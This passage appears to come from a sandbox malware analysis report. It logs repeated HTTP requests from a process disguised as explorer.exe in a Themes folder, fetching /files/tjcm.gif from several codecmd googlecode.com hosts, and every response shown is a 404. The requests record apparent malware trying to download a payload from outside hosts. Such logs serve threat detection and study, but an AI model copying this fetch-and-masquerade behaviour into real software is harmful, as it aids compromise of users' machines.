100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
Sep 2, 2024 14:25:21.947386026 CEST	494	IN	Data Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
48	192.168.2.5	49766	66.102.1.82	80	6300	C:\Windows\Resources\Themes\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Sep 2, 2024 14:25:22.297926903 CEST	215	OUT	GET /files/tjcm.gif HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko Host: codecmd01.googlecode.com Connection: Keep-Alive
Sep 2, 2024 14:25:22.984544992 CEST	1236	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Referrer-Policy: no-referrer Content-Length: 1575 Date: Mon, 02 Sep 2024 12:25:22 GMT Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> {margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px} > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
Sep 2, 2024 14:25:22.984566927 CEST	494	IN	Data Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
49	192.168.2.5	49767	74.125.133.82	80	6300	C:\Windows\Resources\Themes\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Sep 2, 2024 14:25:23.281482935 CEST	215	OUT	GET /files/tjcm.gif HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko Host: codecmd02.googlecode.com Connection: Keep-Alive
Sep 2, 2024 14:25:23.975589037 CEST	1236	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Referrer-Policy: no-referrer Content-Length: 1575 Date: Mon, 02 Sep 2024 12:25:23 GMT Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> {margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px} > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
Sep 2, 2024 14:25:23.975610018 CEST	494	IN	Data Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
50	192.168.2.5	60918	74.125.71.82	80	6300	C:\Windows\Resources\Themes\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Sep 2, 2024 14:25:24.810656071 CEST	215	OUT	GET /files/tjcm.gif HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko Host: codecmd03.googlecode.com Connection: Keep-Alive
Sep 2, 2024 14:25:25.526103973 CEST	1236	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Referrer-Policy: no-referrer Content-Length: 1575 Date: Mon, 02 Sep 2024 12:25:25 GMT Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> {margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px} > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
Sep 2, 2024 14:25:25.526129007 CEST	494	IN	Data Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
51	192.168.2.5	60919	66.102.1.82	80	6300	C:\Windows\Resources\Themes\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Sep 2, 2024 14:25:25.938826084 CEST	215	OUT	GET /files/tjcm.gif HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko Host: codecmd01.googlecode.com Connection: Keep-Alive
Sep 2, 2024 14:25:26.643619061 CEST	1236	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Referrer-Policy: no-referrer Content-Length: 1575 Date: Mon, 02 Sep 2024 12:25:26 GMT Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> {margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px} > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
Sep 2, 2024 14:25:26.643640041 CEST	494	IN	Data Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
52	192.168.2.5	60920	74.125.133.82	80	6300	C:\Windows\Resources\Themes\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Sep 2, 2024 14:25:27.327610016 CEST	215	OUT	GET /files/tjcm.gif HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko Host: codecmd02.googlecode.com Connection: Keep-Alive
Sep 2, 2024 14:25:28.043004036 CEST	1236	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Referrer-Policy: no-referrer Content-Length: 1575 Date: Mon, 02 Sep 2024 12:25:27 GMT Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> {margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px} > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
Sep 2, 2024 14:25:28.043283939 CEST	494	IN	Data Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
53	192.168.2.5	60921	74.125.71.82	80	6300	C:\Windows\Resources\Themes\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Sep 2, 2024 14:25:28.375195980 CEST	215	OUT	GET /files/tjcm.gif HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko Host: codecmd03.googlecode.com Connection: Keep-Alive
Sep 2, 2024 14:25:29.080496073 CEST	1236	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Referrer-Policy: no-referrer Content-Length: 1575 Date: Mon, 02 Sep 2024 12:25:28 GMT Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> {margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px} > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
Sep 2, 2024 14:25:29.080522060 CEST	494	IN	Data Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
54	192.168.2.5	60922	66.102.1.82	80	6300	C:\Windows\Resources\Themes\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Sep 2, 2024 14:25:30.211034060 CEST	215	OUT	GET /files/tjcm.gif HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko Host: codecmd01.googlecode.com Connection: Keep-Alive
Sep 2, 2024 14:25:30.927138090 CEST	1236	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Referrer-Policy: no-referrer Content-Length: 1575 Date: Mon, 02 Sep 2024 12:25:30 GMT Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> {margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px} > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
Sep 2, 2024 14:25:30.927166939 CEST	494	IN	Data Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
55	192.168.2.5	60923	74.125.133.82	80	6300	C:\Windows\Resources\Themes\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Sep 2, 2024 14:25:31.268795013 CEST	215	OUT	GET /files/tjcm.gif HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko Host: codecmd02.googlecode.com Connection: Keep-Alive
